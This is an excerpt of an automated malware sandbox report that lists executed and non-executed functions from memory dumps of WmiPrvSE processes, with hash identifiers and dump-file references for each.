                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.2188963715.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9b8a0000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 184a2c3277aecd18d76af0935761f92e34412be27cf2f83d8a67b28de76b0507
                                                                                                                            • Instruction ID: d8a09b481ca081fc19b32288a85295b7b226be38ccbd6673d180672c6e16dc1c
                                                                                                                            • Opcode Fuzzy Hash: 184a2c3277aecd18d76af0935761f92e34412be27cf2f83d8a67b28de76b0507
                                                                                                                            • Instruction Fuzzy Hash: CEC0123061180C9FCA88FB28C894D14B3A0FB1D304B960094E00DCB2B1E62AECC6CB40
                                                                                                                            Function 00007FFD9B8B4CA2 Relevance: .0, Instructions: 13COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.2188963715.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9b8b0000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 985abb8d6beb36a6e63653237f6bf30b7901326012704906343365838102349e
                                                                                                                            • Instruction ID: c9e0b26e10e0dea48ce6d5365683387d5a47bd7524e049ba30d43027733e46ff
                                                                                                                            • Opcode Fuzzy Hash: 985abb8d6beb36a6e63653237f6bf30b7901326012704906343365838102349e
                                                                                                                            • Instruction Fuzzy Hash: B1D0A930A0801E8BEA58EB9894B17B93262EF4C340F260478E80EC3187CE28A9138A11
                                                                                                                            Function 00007FFD9B8A06A5 Relevance: .0, Instructions: 13COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.2188963715.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9b8a0000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 4e81d36aed7d78191ebda0ce0bf6983de95ec8fc31eb21b89629192ec54cf290
                                                                                                                            • Instruction ID: cf8b1511bca6861f126c738684d092e320ea0aa4ac3cc11059dc86341731be83
                                                                                                                            • Opcode Fuzzy Hash: 4e81d36aed7d78191ebda0ce0bf6983de95ec8fc31eb21b89629192ec54cf290
                                                                                                                            • Instruction Fuzzy Hash: 66C00205F6B65E01E83573AA98660ACA1405BDDE18FD61172D54D400A1A84D22990166
                                                                                                                            Function 00007FFD9B8A4F9A Relevance: .0, Instructions: 12COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.2188963715.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9b8a0000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 1b2b3c2d85a3abd11b2da3d8a32830ac431de2c2fdd79ce0711182b374d4f6b4
                                                                                                                            • Instruction ID: ac6ccb5621dc0d78229cc7f75d3ee409b06097606b84b3d2ae09dc2f53518553
                                                                                                                            • Opcode Fuzzy Hash: 1b2b3c2d85a3abd11b2da3d8a32830ac431de2c2fdd79ce0711182b374d4f6b4
                                                                                                                            • Instruction Fuzzy Hash: 52D0C920E0991A86FBA4A284D8A03A662A19B98345F1900B9DA0EE32E1DD28AF418615
                                                                                                                            Function 00007FFD9B8A2A44 Relevance: .0, Instructions: 10COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.2188963715.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9b8a0000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 723be9a78e707f31f702144baacd3dc53a8ec2a400c92c2bac591daaccd9effb
                                                                                                                            • Instruction ID: 1413d19affb5c5294512f757b9356f660020bafe6d6d47099747160b8239cb5e
                                                                                                                            • Opcode Fuzzy Hash: 723be9a78e707f31f702144baacd3dc53a8ec2a400c92c2bac591daaccd9effb
                                                                                                                            • Instruction Fuzzy Hash: EBC04C10F1C81A06E75A7354542567E44539B44644F990475E41EE73CECD9D6D1242D7
                                                                                                                            Function 00007FFD9B8A06C8 Relevance: .0, Instructions: 8COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.2188963715.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9b8a0000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 666cf8b823b28f899d201f99a08d7ce51af468bea5ae6a0f7c31dc5b3b410cef
                                                                                                                            • Instruction ID: 500de31fcb602731ecb130915a19b6f2b80e3f21754f6ce5700eee3f78151dc1
                                                                                                                            • Opcode Fuzzy Hash: 666cf8b823b28f899d201f99a08d7ce51af468bea5ae6a0f7c31dc5b3b410cef
                                                                                                                            • Instruction Fuzzy Hash: 74B00204E7744F01E47833FA199616574545B4D614FD61170D44D50195984D36991267

                                                                                                                            Non-executed Functions

                                                                                                                            Function 00007FFD9B8A09B0 Relevance: 5.2, Strings: 4, Instructions: 181COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.2188963715.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_32_2_7ffd9b8a0000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: c9$!k9$"s9$#{9
                                                                                                                            • API String ID: 0-1692736845
                                                                                                                            • Opcode ID: efb77ea5f0da1de96a94b877d211cc8378bf186da6759c58b54f7359f13cb85e
                                                                                                                            • Instruction ID: fa77125614068ae6b4ae2141eb752504fbd7486b0eee6ed5bfa7fe3a6792f0ed
                                                                                                                            • Opcode Fuzzy Hash: efb77ea5f0da1de96a94b877d211cc8378bf186da6759c58b54f7359f13cb85e
                                                                                                                            • Instruction Fuzzy Hash: 8641A187B1947A85E31E37FC79299FD6B44CF8533DB0843B7E05D8A0C76D88608692E5

                                                                                                                            Executed Functions

                                                                                                                            Function 00007FFD9B870D80 Relevance: .3, Instructions: 273COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000021.00000002.2243812920.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_33_2_7ffd9b870000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b8dee9641e12708cb5721b7eecec963dd562bffd0a2db92aff2db7e4d77e906e
                                                                                                                            • Instruction ID: 67270c53777a2c22469ca3d2e6608c1f54e9de573c9c56f143225ba539af671a
                                                                                                                            • Opcode Fuzzy Hash: b8dee9641e12708cb5721b7eecec963dd562bffd0a2db92aff2db7e4d77e906e
                                                                                                                            • Instruction Fuzzy Hash: CA910671A19A4D8FEB99EB6888A57A97FE1FF99314F4000BBD04CD32D6CB781401C741
                                                                                                                            Function 00007FFD9B8A15A9 Relevance: 1.3, Strings: 1, Instructions: 67COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000021.00000002.2243812920.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_33_2_7ffd9b8a1000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: M
                                                                                                                            • API String ID: 0-3664761504
                                                                                                                            • Opcode ID: 44d47399855b4f718b812f194e8d5246f00a2cc44449accc9c886139efeaf4d2
                                                                                                                            • Instruction ID: 7efd1b55e3c95c8abdead7d54391fbc7676390804a60c7a0156887f05cbb413a
                                                                                                                            • Opcode Fuzzy Hash: 44d47399855b4f718b812f194e8d5246f00a2cc44449accc9c886139efeaf4d2
                                                                                                                            • Instruction Fuzzy Hash: 70112C71E0F7884FD765EB7888A90987FB0EF1A300B4A45EBC049CB0A3EE29D945C741
                                                                                                                            Function 00007FFD9B8AB089 Relevance: 1.3, Strings: 1, Instructions: 30COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000021.00000002.2243812920.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_33_2_7ffd9b8a1000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: M
                                                                                                                            • API String ID: 0-3664761504
                                                                                                                            • Opcode ID: 22fcb8aafadc907cf4429b3ab6e086b6b281421009128fe4e7aa59c141c9d6fb
                                                                                                                            • Instruction ID: 27629c5498f257d3f39053f46ff184fbb08320db44ab61bdbdc76f1745830223
                                                                                                                            • Opcode Fuzzy Hash: 22fcb8aafadc907cf4429b3ab6e086b6b281421009128fe4e7aa59c141c9d6fb
                                                                                                                            • Instruction Fuzzy Hash: B9E0656190B7844FC715AA3488698547FA0EF6720174A52EEC045CF1A3EA2DD885C711
                                                                                                                            Function 00007FFD9B8AAFB9 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000021.00000002.2243812920.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_33_2_7ffd9b8a1000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: M
                                                                                                                            • API String ID: 0-3664761504
                                                                                                                            • Opcode ID: 2c04ba627061d28c29ce5c60626fd29d159405507c478a303202fca9577c8853
                                                                                                                            • Instruction ID: 263f1ecab61192de6a995d4bc8d66cb8c76d663368066db1136b6911208e8e48
                                                                                                                            • Opcode Fuzzy Hash: 2c04ba627061d28c29ce5c60626fd29d159405507c478a303202fca9577c8853
                                                                                                                            • Instruction Fuzzy Hash: 1DE0656150B7844FCB199A3584694547FA0EF6720174A52EEC045CB5A3EA2D9885C701
                                                                                                                            Function 00007FFD9B8A3B79 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000021.00000002.2243812920.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_33_2_7ffd9b8a1000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: M
                                                                                                                            • API String ID: 0-3664761504
                                                                                                                            • Opcode ID: 9662a6f0a7edc4b4c64f0a28711b2642a6b50315399ebaa1afd990c2c15976a2
                                                                                                                            • Instruction ID: 3f61b9276bdcfe85a0c4d7b2c996db411421c38e232b899a6a3a3b0fc8ec33b6
                                                                                                                            • Opcode Fuzzy Hash: 9662a6f0a7edc4b4c64f0a28711b2642a6b50315399ebaa1afd990c2c15976a2
                                                                                                                            • Instruction Fuzzy Hash: 6DE06D7160F7C54FC71AAA388869454BFA0EF6721174A42EFC045CF1A7EA2D8889C701
                                                                                                                            Function 00007FFD9B8A28B9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000021.00000002.2243812920.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_33_2_7ffd9b8a1000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: M
                                                                                                                            • API String ID: 0-3664761504
                                                                                                                            • Opcode ID: e0e931b298ea436d0b3402fd866c73120f8f1541834c7ce07ba60a57d1942476
                                                                                                                            • Instruction ID: b7e7600cb1ce5b0d03deb82dccca8f86c1a059a0a8571b3deb35318874b4dc7d
                                                                                                                            • Opcode Fuzzy Hash: e0e931b298ea436d0b3402fd866c73120f8f1541834c7ce07ba60a57d1942476
                                                                                                                            • Instruction Fuzzy Hash: 1AE06D2164E3C04FCB16AB348868455BFA0EE6720174A52EFC096CB1A3EA2D8989CB01
                                                                                                                            Function 00007FFD9B8A8D09 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000021.00000002.2243812920.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_33_2_7ffd9b8a1000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: I
                                                                                                                            • API String ID: 0-3707901625
                                                                                                                            • Opcode ID: 5476b5b955ca7212c6931c3ad42272a5885e2f67b914840ef1209d9df8880d59
                                                                                                                            • Instruction ID: 896374f14361d202d19b9e63f5f115d51dd669f848f8583988efdb471d3011ad
                                                                                                                            • Opcode Fuzzy Hash: 5476b5b955ca7212c6931c3ad42272a5885e2f67b914840ef1209d9df8880d59
                                                                                                                            • Instruction Fuzzy Hash: EDE06D6154F3D04FCB06DB74886A8047FB0AE6720078A41EEC045CF1B3E6198949C711
                                                                                                                            Function 00007FFD9B8AB589 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000021.00000002.2243812920.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_33_2_7ffd9b8a1000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: I
                                                                                                                            • API String ID: 0-3707901625
                                                                                                                            • Opcode ID: 2ee88919ac1ca4b211d98a04b23072bfc9f10b694a8a521ad7f66b1e826bb53d
                                                                                                                            • Instruction ID: 1d3731bc69828d08ef363349f771d8598db7c125401b7acb80ca8ea47eec5bff
                                                                                                                            • Opcode Fuzzy Hash: 2ee88919ac1ca4b211d98a04b23072bfc9f10b694a8a521ad7f66b1e826bb53d
                                                                                                                            • Instruction Fuzzy Hash: 69E0E56154E7D44FCB16AB74886A8457FA0AE6B31078A44EEC185CF1B3E6299849C701
                                                                                                                            Function 00007FFD9B8A2949 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000021.00000002.2243812920.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_33_2_7ffd9b8a1000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: I
                                                                                                                            • API String ID: 0-3707901625
                                                                                                                            • Opcode ID: 5cef69dda8ed1410be6685b3d643887a72678e3174d0996b250fee644651e0a4
                                                                                                                            • Instruction ID: 530f6c3c0d1d0106e70f666ce657ba592a8ecdd586e4ec849b90d632909f9d2e
                                                                                                                            • Opcode Fuzzy Hash: 5cef69dda8ed1410be6685b3d643887a72678e3174d0996b250fee644651e0a4
                                                                                                                            • Instruction Fuzzy Hash: 5CE04F7154A3C04FCB16EB7484A98457FB0EE6721078B41DEC04ACB1B3E62D8949CB01
                                                                                                                            Function 00007FFD9B8A4045 Relevance: .3, Instructions: 299COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000021.00000002.2243812920.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_33_2_7ffd9b8a1000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: da1e0220d7e0338031f1362267d4d1d14eb2f8dff765813994b1b5e3a393e154
                                                                                                                            • Instruction ID: 24e2f5dfdcc0f36b8ad48e8199fd13ab2ec3ab9667e17346d027783c5a939f02
                                                                                                                            • Opcode Fuzzy Hash: da1e0220d7e0338031f1362267d4d1d14eb2f8dff765813994b1b5e3a393e154
                                                                                                                            • Instruction Fuzzy Hash: 4E911521B1DA4E0FEBACEB68847667573D2EFA8344F0941BED40DC31E7ED2869468351
                                                                                                                            Function 00007FFD9B8708D0 Relevance: .2, Instructions: 158COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000021.00000002.2243812920.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_33_2_7ffd9b870000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0f6f52663a60de632b520fc487d6cd734ee2f141d6827be95a6252084a0c0153
                                                                                                                            • Instruction ID: 01e712daa912245c1ae18be8bbf8832d690c88cd7028228964495c0ad7d89791
                                                                                                                            • Opcode Fuzzy Hash: 0f6f52663a60de632b520fc487d6cd734ee2f141d6827be95a6252084a0c0153
                                                                                                                            • Instruction Fuzzy Hash: 7A414B22B1C5294FE719B7AC74A9AFD7785EF8932DB0441FBD04DC71EBDD18A8428284
                                                                                                                            Function 00007FFD9B8A2F81 Relevance: .1, Instructions: 118COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000021.00000002.2243812920.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_33_2_7ffd9b8a1000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a476fbfb5f878a4220a9604f1f301fac5486c835574db21fc39845904e14db5c
                                                                                                                            • Instruction ID: fe7961ea99f83522ac0b361fe874af16e81759f794bb8d4a1e1d159d87363c2e
                                                                                                                            • Opcode Fuzzy Hash: a476fbfb5f878a4220a9604f1f301fac5486c835574db21fc39845904e14db5c
                                                                                                                            • Instruction Fuzzy Hash: A0317331A0DA5D8FE768EB58C864BE933A1FBA9310F0402BBD00DD72D2DE286D4187C1
                                                                                                                            Function 00007FFD9B870C25 Relevance: .1, Instructions: 98COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000021.00000002.2243812920.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_33_2_7ffd9b870000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 9aad23755e6b9030ab8223024640358d9ebff05fc5b92a19e399688e299082fa
                                                                                                                            • Instruction ID: f0a0f5ac7c7efd998352c22c0dc1160b25aa6e7164344ddeb6354d87803ef842
                                                                                                                            • Opcode Fuzzy Hash: 9aad23755e6b9030ab8223024640358d9ebff05fc5b92a19e399688e299082fa
                                                                                                                            • Instruction Fuzzy Hash: C3314931F1D24D8FFB26E7A898A55EC7B60DF95318F0541B7D048CB1D3D9382646A741
                                                                                                                            Function 00007FFD9B870998 Relevance: .1, Instructions: 93COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000021.00000002.2243812920.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_33_2_7ffd9b870000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: daa4c2d56e67d7297f73326369b02d9933c916143d1b0084933934c932b91cb3
                                                                                                                            • Instruction ID: c8c6ee4391c1f3057ef9414e95d6272298cf9521001b55cfb64e3b8fad30b454
                                                                                                                            • Opcode Fuzzy Hash: daa4c2d56e67d7297f73326369b02d9933c916143d1b0084933934c932b91cb3
                                                                                                                            • Instruction Fuzzy Hash: 3C21C920B2991D0FE798F76C54AA77972C6EBDD359F4100BAE40EC33E6DD18AC424255
                                                                                                                            Function 00007FFD9B8A2D78 Relevance: .1, Instructions: 86COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000021.00000002.2243812920.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_33_2_7ffd9b8a1000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 98a5e80558fb357a651b35e57ceae18da11876d207a158660375e5d4eb66b94e
                                                                                                                            • Instruction ID: 50275734c11aafd11add39c47da6920d368d50e3df55c1cc08ec65da528b929e
                                                                                                                            • Opcode Fuzzy Hash: 98a5e80558fb357a651b35e57ceae18da11876d207a158660375e5d4eb66b94e
                                                                                                                            • Instruction Fuzzy Hash: DF21F722B0995E5FE7A9EBE898B67F46382EF98314F0501BAD41DC21E3DC2929894311
                                                                                                                            Function 00007FFD9B8711AD Relevance: .1, Instructions: 84COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000021.00000002.2243812920.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_33_2_7ffd9b870000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 96911a6be977e4cd3780273ab1ad26c25c18e2be1edf10500536cad214b6b7d8
                                                                                                                            • Instruction ID: 6c8cc129abc941b49ee4da663f25dceb0075858a6cd953864ba30c1068716168
                                                                                                                            • Opcode Fuzzy Hash: 96911a6be977e4cd3780273ab1ad26c25c18e2be1edf10500536cad214b6b7d8
                                                                                                                            • Instruction Fuzzy Hash: DF316531A0964E8FDB49EB64C8A49B97BF1FF5A304B0505FBD009D71A6DB38A940CB50
                                                                                                                            Function 00007FFD9B8823BC Relevance: .1, Instructions: 73COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000021.00000002.2243812920.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_33_2_7ffd9b880000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0c8eb74ef1272f3d408719a4cbeff685328e4dcedcdd9b6bbc38124adfc6a33b
                                                                                                                            • Instruction ID: 168d359260540dc90d569d5e3df83322366e38b1c39a7e4459c33352ec2db60a
                                                                                                                            • Opcode Fuzzy Hash: 0c8eb74ef1272f3d408719a4cbeff685328e4dcedcdd9b6bbc38124adfc6a33b
                                                                                                                            • Instruction Fuzzy Hash: 1D210E61F0991D8BEBA8DA98946576873E2FB98701F154179D01D932E6CE34AD828B80
                                                                                                                            Function 00007FFD9B887E67 Relevance: .1, Instructions: 65COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000021.00000002.2243812920.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_33_2_7ffd9b880000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 96f8dada00cf73754e14ad0ad092117bf82988f5a0db13506c23d5282f6dabac
                                                                                                                            • Instruction ID: d0f62a03a512fa2989f49ca3c3278c1f1da64781a007e4c118f8c05c8b5549d9
                                                                                                                            • Opcode Fuzzy Hash: 96f8dada00cf73754e14ad0ad092117bf82988f5a0db13506c23d5282f6dabac
                                                                                                                            • Instruction Fuzzy Hash: C3216D70E0A95E8FEBA4EB98C464BBD72A2FF58300F1501B5C41DD72E5DE386A41CB80
                                                                                                                            Function 00007FFD9B8809E5 Relevance: .1, Instructions: 58COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000021.00000002.2243812920.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_33_2_7ffd9b880000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c1be780b657c568a6036f8f155889318a10a5a995cb53696d169141e34713e9b
                                                                                                                            • Instruction ID: b92cbca939a7716a1564ff8a6129e681db4dcd13bff8ff70af6a06d7db0073ea
                                                                                                                            • Opcode Fuzzy Hash: c1be780b657c568a6036f8f155889318a10a5a995cb53696d169141e34713e9b
                                                                                                                            • Instruction Fuzzy Hash: 0A11E972B1991ACFDB15BBADE4948E837A0FF48335B5101B7D01DCA0A3DA3864868750
                                                                                                                            Function 00007FFD9B8809D5 Relevance: .1, Instructions: 53COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000021.00000002.2243812920.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_33_2_7ffd9b880000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: e3b313a973305628e6fe3838a96aaa3757b5b482a247e9aab7ba26cb2c08e22a
                                                                                                                            • Instruction ID: c262a7218b5e8b067baf160ec330c8c5886b092ca7ee4cf5a7e92e50301df430
                                                                                                                            • Opcode Fuzzy Hash: e3b313a973305628e6fe3838a96aaa3757b5b482a247e9aab7ba26cb2c08e22a
                                                                                                                            • Instruction Fuzzy Hash: E501B971B1951ACFD716FF6DE8958A837A0FF49335B5101B6D04ACB0A2D6385885CB50
                                                                                                                            Function 00007FFD9B870BB5 Relevance: .1, Instructions: 52COMMON
